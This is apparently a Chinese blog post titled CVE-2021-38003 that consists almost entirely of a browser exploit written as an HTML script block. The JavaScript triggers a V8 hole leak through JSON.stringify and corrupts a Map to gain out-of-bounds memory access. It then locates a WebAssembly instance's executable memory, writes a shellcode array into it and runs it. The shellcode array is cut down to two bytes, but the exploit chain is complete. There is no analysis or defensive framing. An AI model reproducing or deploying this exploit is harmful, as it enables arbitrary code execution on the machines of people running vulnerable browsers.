CVE-2021-38003

MCtech 57 0 
<script type="text/javascript">

function gc() {
    for (var i = 0; i < 0x100; i++) new Array(0x200);
  }
  var shellcode = [
0xfc, 0xe8, 
  ];
  var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
  var dv = new DataView(new ArrayBuffer(0x10));
  function f2big(f) {
    dv.setFloat64(0, f, true);
    return (dv.getBigUint64(0, true));
  }
  function big2f(b) {
    dv.setBigUint64(0, b);
    return dv.getFloat64(0);
  }
  function flow(f) {
    dv.setFloat64(0, f, true);
    return (dv.getUint32(0, true));
  }
  function fhi(f) {
    dv.setFloat64(0, f, true);
    return (dv.getUint32(4, true));
  }
  function i2f(low, hi) {
    dv.setUint32(0, low, true);
    dv.setUint32(4, hi, true);
    return dv.getFloat64(0, true);
  }
  var oob_arr = null;
  var leak = null;
  var rw_buff = null;
  for (let i = 0; i < 0x1000; i++) {
    oob_arr = [1.1, 1.1];
    leak = { ele: null };
    rw_buff = new ArrayBuffer(0x1000);
  }
  var rw_view = new DataView(rw_buff);
  rw_view.setBigUint64(0, 0x11223355n, true);
  var wasmModule = new WebAssembly.Module(wasmCode);
  var wasmInstance = new WebAssembly.Instance(wasmModule);
  var f = wasmInstance.exports.main;
  function trigger() {
    let a = [], b = [];
    let s = '"'.repeat(0x800000);
    a[20000] = s;
    for (let i = 0; i < 10; i++) a[i] = s;
    for (let i = 0; i < 10; i++) b[i] = a;
    try {
      JSON.stringify(b);
    } catch (hole) {
      return hole;
    }
    throw new Error('could not trigger');
  }
  let hole = trigger();
  var map1 = null;
  var map2 = null;
  var arr = null;
  function makeMapOdd(m, h) {
    m = new Map();
    m.set(1, 1);
    m.set(h, 1);
    m.delete(h);
    m.delete(h);
    m.delete(1);
    return m;
  }
  for (let i = 0; i < 0x1000; i++) {
    map1 = makeMapOdd(map1, hole);
    arr = new Array(1.1, 1.1);
  }
  //alert(map1.size);
  map1.set(0x10, -1);
  gc();
  leak.ele = wasmInstance;
  map1.set(oob_arr, 0xffff);

  let wasm_low = fhi(arr[2]);
  //alert("search wasm mod low addr: " + (wasm_low).toString(16));
  leak.ele = null;
  //alert("check arr indx 0");
  arr[0] = i2f(wasm_low, 0x20);
  
  let rwx = flow(oob_arr[7]);
  //alert("rwx: " + rwx.toString(16));
  arr[5] = i2f(rwx, 0x1000);
  alert("backingStore");
  for (let i = 0; i < shellcode.length; i++) {
    rw_view.setInt8(i, shellcode[i]);
  }
  //alert("calc");
  f();
</script>

本文作者为MCtech,转载请注明。

发表评论 取消回复
表情 图片 链接 代码

分享